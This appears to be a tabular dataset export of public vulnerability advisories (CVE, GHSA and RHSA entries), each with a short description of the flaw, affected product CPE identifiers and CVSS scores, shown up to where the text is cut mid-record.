id
stringlengths 12
47
| title
stringlengths 0
256
⌀ | description
stringlengths 3
189k
| cpes
listlengths 0
5.42k
| cvss_v4_0
float64 0
10
⌀ | cvss_v3_1
float64 0
10
⌀ | cvss_v3_0
float64 0
10
⌀ | cvss_v2_0
float64 0
10
⌀ | patch_commit_url
stringlengths 36
232
⌀ |
---|---|---|---|---|---|---|---|---|
GHSA-q3w6-ggw8-49fj
|
Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly.
|
[] | null | 8.1 | null | null | null |
|
CVE-2022-34189
|
Jenkins Image Tag Parameter Plugin 1.10 and earlier does not escape the name and description of Image Tag parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.
|
[
"cpe:2.3:a:jenkins:image_tag_parameter:*:*:*:*:*:jenkins:*:*"
] | null | 5.4 | null | 3.5 | null |
|
GHSA-jx8c-f92c-p5qr
|
IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 198235.
|
[] | null | null | null | null | null |
|
CVE-2022-0984
|
Users with the capability to configure badge criteria (teachers and managers by default) were able to configure course badges with profile field criteria, which should only be available for site badges.
|
[
"cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*",
"cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*"
] | null | 4.3 | null | 4 | null |
|
CVE-2023-4732
|
Kernel: race between task migrating pages and another task calling exit_mmap to release those same pages getting invalid opcode bug in include/linux/swapops.h
|
A flaw was found in pfn_swap_entry_to_page in memory management subsystem in the Linux Kernel. In this flaw, an attacker with a local user privilege may cause a denial of service problem due to a BUG statement referencing pmd_t x.
|
[
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:codeready_linux_builder:8.0:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:8.0_aarch64:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_arm_64:8.0_aarch64:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_real_time:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8.0:*:*:*:*:*:*:*",
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/a:redhat:rhel_eus:8.8::crb",
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/o:redhat:enterprise_linux:6",
"cpe:/o:redhat:enterprise_linux:7",
"cpe:/o:redhat:enterprise_linux:9"
] | null | 4.7 | null | null | null |
CVE-2023-36516
|
WordPress LearnPress plugin <= 4.2.3 - Authenticated Broken Access Control vulnerability
|
Missing Authorization vulnerability in ThimPress LearnPress.This issue affects LearnPress: from n/a through 4.2.3.
|
[
"cpe:2.3:a:thimpress:learnpress:4.2.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*"
] | null | 7.6 | null | null | null |
CVE-2013-0087
|
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability."
|
[
"cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:professional_x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:sp2:itanium:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x86:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_7:-:sp1:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_7:-:sp1:x86:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:r2:itanium:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:r2:x64:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_8:-:-:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_8:-:-:x86:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"
] | null | null | null | 9.3 | null |
|
GHSA-v4h8-rwfj-mm33
|
SQL injection vulnerability in admin/data_files/move.php in Maian Uploader 4.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
|
[] | null | null | null | null | null |
|
CVE-2023-38465
|
In ims service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges
|
[
"cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*",
"cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:s8000:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:sc9832e:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:sc9863a:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t310:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t606:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t610:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t612:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t616:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t618:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t760:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t770:-:*:*:*:*:*:*:*",
"cpe:2.3:h:unisoc:t820:-:*:*:*:*:*:*:*"
] | null | 5.5 | null | null | null |
|
GHSA-hvmf-hx9f-ccx5
|
PHP remote file inclusion vulnerability in modules/global/inc/content.inc.php in BoonEx Ray 3.5, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sIncPath parameter.
|
[] | null | null | null | null | null |
|
CVE-2009-0566
|
Microsoft Office Publisher 2007 SP1 does not properly calculate object handler data for Publisher files, which allows remote attackers to execute arbitrary code via a crafted file in a legacy format that triggers memory corruption, aka "Pointer Dereference Vulnerability."
|
[
"cpe:2.3:a:microsoft:office_publisher:2007:sp1:*:*:*:*:*:*"
] | null | null | null | 9.3 | null |
|
GHSA-23fp-xqj8-q68w
|
SQL injection vulnerability in siteadmin/forgot.php in PHP JOBWEBSITE PRO allows remote attackers to execute arbitrary SQL commands via the adname parameter in a Submit action.
|
[] | null | null | null | null | null |
|
CVE-2025-7849
|
Memory Corruption Issue in NI LabVIEW due to improper error handling
|
A memory corruption vulnerability due to improper error handling when a VILinkObj is null exists in NI LabVIEW that may result in arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q1 and prior versions.
|
[] | 8.5 | 7.8 | null | null | null |
GHSA-g328-m8jq-63j6
|
VMware vCenter Server 5.5 before u3 and 6.0 before u1 does not verify X.509 certificates from TLS LDAP servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
|
[] | null | null | null | null | null |
|
GHSA-v69f-4qw7-8fp4
|
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3, 6.3.1, and 6.3.2 allows remote authenticated users to affect availability via unknown vectors related to Data, Domain & Function Security.
|
[] | null | null | null | null | null |
|
CVE-2021-36955
|
Windows Common Log File System Driver Elevation of Privilege Vulnerability
|
Windows Common Log File System Driver Elevation of Privilege Vulnerability
|
[
"cpe:2.3:o:microsoft:windows_10_1809:10.0.17763.2183:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1809:10.0.17763.2183:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_1809:10.0.17763.2183:*:*:*:*:*:arm64:*",
"cpe:2.3:o:microsoft:windows_server_2019:10.0.17763.2183:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1909:10.0.18363.1801:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1909:10.0.18363.1801:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_1809:10.0.18363.1801:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_21h1:10.0.19043.1237:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_21h1:10.0.19043.1237:*:*:*:*:*:arm64:*",
"cpe:2.3:o:microsoft:windows_10_21h1:10.0.19043.1237:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_server_2022:10.0.20348.230:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1809:10.0.19041.1237:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2004:10.0.19041.1237:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_20h2:10.0.19042.1237:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_20h2:10.0.19042.1237:*:*:*:*:*:arm64:*",
"cpe:2.3:o:microsoft:windows_server_20h2:10.0.19042.1237:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1507:10.0.10240.19060:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1507:10.0.10240.19060:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_1607:10.0.14393.4651:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_10_1607:10.0.14393.4651:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2016:10.0.14393.4651:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_7:6.1.7601.25712:sp1:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_7:6.1.7601.25712:sp1:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_8.1:6.3.9600.20120:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_8.1:6.3.9600.20120:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_rt_8.1:6.3.9600.20120:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008_sp2:6.0.6003.21218:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2008_sp2:6.0.6003.21218:*:*:*:*:*:x86:*",
"cpe:2.3:o:microsoft:windows_server_2008_r2:6.1.7601.25712:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2012:6.2.9200.23462:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2012_r2:6.3.9600.20120:*:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_2004:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10_21h1:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*",
"cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*",
"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*",
"cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_20h2:*:*:*:*:*:*:*:*"
] | null | 7.8 | null | null | null |
RHSA-2020:3372
|
Red Hat Security Advisory: Red Hat OpenShift Service Mesh 3scale-istio-adapter-rhel8-container security update
|
golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
|
[
"cpe:/a:redhat:service_mesh:1.0::el8"
] | null | 7.5 | null | null | null |
GHSA-5hmh-cjgq-w2rw
|
WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
|
[] | null | null | null | null | null |
|
GHSA-x3x2-2jvr-34w4
|
Cross-Site Request Forgery (CSRF) vulnerability in Dipak C. Gajjar WP Super Minify plugin <= 1.5.1 versions.
|
[] | null | 5.4 | null | null | null |
|
CVE-2011-2142
|
The Web Client Service in IBM Datacap Taskmaster Capture 8.0.1 before FP1 requires a cleartext password, which has unspecified impact and attack vectors.
|
[
"cpe:2.3:a:ibm:datacap_taskmaster_capture:8.0.1:*:*:*:*:*:*:*"
] | null | null | null | 5 | null |
|
GHSA-gqm8-m83m-qjfv
|
The SUSE coreutils-i18n.patch for GNU coreutils allows context-dependent attackers to cause a denial of service (segmentation fault and crash) via a long string to the join command, when using the -i switch, which triggers a stack-based buffer overflow in the alloca function.
|
[] | null | null | null | null | null |
|
CVE-2010-3285
|
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to cause a denial of service via unknown vectors.
|
[
"cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*",
"cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*"
] | null | null | null | 5 | null |
|
CVE-2016-6355
|
Memory leak in Cisco IOS XR 5.1.x through 5.1.3, 5.2.x through 5.2.5, and 5.3.x through 5.3.2 on ASR 9001 devices allows remote attackers to cause a denial of service (control-plane protocol outage) via crafted fragmented packets, aka Bug ID CSCux26791.
|
[
"cpe:2.3:o:cisco:ios_xr:5.1.0:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.1.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.1.1.k9sec:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.1.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.1.3:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.0:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.3:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.4:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.2.5:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.3.0:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.3.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xr:5.3.2:*:*:*:*:*:*:*"
] | null | null | 7.5 | 7.8 | null |
|
CVE-2023-34261
|
Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow identification of valid user accounts via username enumeration because they lead to a "nicht einloggen" error rather than a falsch error.
|
[
"cpe:2.3:h:kyocera:taskalfa_4053ci:*:*:*:*:*:*:*:*",
"cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*",
"cpe:2.3:h:kyocera:d-copia253mf_plus:-:*:*:*:*:*:*:*"
] | null | 5.3 | null | null | null |
|
CVE-2009-2503
|
GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability."
|
[
"cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:*:sp2:itanium:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:*:sp2:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:*:itanium:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:*:x32:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2008:*:*:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_vista:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_vista:*:*:x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_vista:*:sp1:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:professional_x64:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:sp4:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:.net_framework:1.1:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:.net_framework:2.0:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:report_viewer:2005:sp1:redistributable_package:*:*:*:*:*",
"cpe:2.3:a:microsoft:report_viewer:2008:*:redistributable_package:*:*:*:*:*",
"cpe:2.3:a:microsoft:report_viewer:2008:sp1:redistributable_package:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp2:itanium:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp2:x64:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp3:itanium:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server:2005:sp3:x64:*:*:*:*:*",
"cpe:2.3:a:microsoft:sql_server_reporting_services:2000:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:excel_viewer:2003:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:excel_viewer:2003:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:expression_web:*:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:expression_web:2:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office:2003:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office:2007:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office:2007:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office:xp:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_compatibility_pack:2007:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_compatibility_pack:2007:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_excel_viewer:*:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_groove:2007:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_groove:2007:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_powerpoint_viewer:*:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_powerpoint_viewer:2007:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_powerpoint_viewer:2007:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:office_word_viewer:*:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:project:2002:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visio:2002:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:word_viewer:2003:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:word_viewer:2003:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:works:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:platform_sdk:*:*:redistrutable_gdi\\+:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_studio:2008:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_studio:2008:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_studio_.net:2003:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_studio_.net:2005:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:forefront_client_security:1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_foxpro:8.0:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:visual_foxpro:9.0:sp2:*:*:*:*:*:*"
] | null | null | null | 9.3 | null |
|
CVE-2020-1077
|
An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.
|
[
"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2019:1903:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_server_2019:1909:*:*:*:*:*:*:*"
] | null | 7.8 | null | 4.6 | null |
|
CVE-2013-5808
|
Unspecified vulnerability in the Oracle iPlanet Web Proxy Server component in Oracle Fusion Middleware 4.0 allows remote attackers to affect confidentiality via unknown vectors related to Administration.
|
[
"cpe:2.3:a:oracle:fusion_middleware:4.0:*:*:*:*:*:*:*"
] | null | null | null | 2.6 | null |
|
GHSA-7wj9-f5xc-vmq2
|
An E-RAB Release Command packet containing a malformed NAS PDU will cause the Athonet MME to immediately crash, potentially due to a buffer overflow.
|
[] | null | 5.9 | null | null | null |
|
GHSA-mvph-h5j7-4h2g
|
.NET Elevation of Privilege Vulnerability
|
[] | null | 7.3 | null | null | null |
|
CVE-2004-0928
|
The Microsoft IIS Connector in JRun 4.0 and Macromedia ColdFusion MX 6.0, 6.1, and 6.1 J2EE allows remote attackers to bypass authentication and view source files, such as .asp, .pl, and .php files, via an HTTP request that ends in ";.cfm".
|
[
"cpe:2.3:a:hitachi:cosminexus_enterprise:01_01_1:*:enterprise:*:*:*:*:*",
"cpe:2.3:a:hitachi:cosminexus_enterprise:01_01_1:*:standard:*:*:*:*:*",
"cpe:2.3:a:hitachi:cosminexus_enterprise:01_02_2:*:enterprise:*:*:*:*:*",
"cpe:2.3:a:hitachi:cosminexus_enterprise:01_02_2:*:standard:*:*:*:*:*",
"cpe:2.3:a:hitachi:cosminexus_server:web_01-01_1:*:*:*:*:*:*:*",
"cpe:2.3:a:hitachi:cosminexus_server:web_01-01_2:*:*:*:*:*:*:*",
"cpe:2.3:a:macromedia:coldfusion:6.0:*:*:*:*:*:*:*",
"cpe:2.3:a:macromedia:coldfusion:6.1:*:*:*:*:*:*:*",
"cpe:2.3:a:macromedia:jrun:3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:macromedia:jrun:3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:macromedia:jrun:4.0:*:*:*:*:*:*:*"
] | null | null | null | 5 | null |
|
CVE-2024-3618
|
SourceCodester Kortex Lite Advocate Office Management System activate_case.php sql injection
|
A vulnerability, which was classified as critical, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected is an unknown function of the file /control/activate_case.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-260274 is the identifier assigned to this vulnerability.
|
[] | null | 4.7 | 4.7 | 5.8 | null |
CVE-2021-40360
|
A vulnerability has been identified in SIMATIC PCS 7 V8.2 (All versions), SIMATIC PCS 7 V9.0 (All versions), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP1), SIMATIC WinCC V15 and earlier (All versions < V15 SP1 Update 7), SIMATIC WinCC V16 (All versions < V16 Update 5), SIMATIC WinCC V17 (All versions < V17 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 19), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 6). The password hash of a local user account in the remote server could be granted via public API to a user on the affected system. An authenticated attacker could brute force the password hash and use it to login to the server.
|
[
"cpe:2.3:a:siemens:simatic_pcs_7:*:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_pcs_7:9.0:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_pcs_7:9.1:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:*:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update10:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update11:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update12:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update13:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update14:*:*:*:*:*:*",
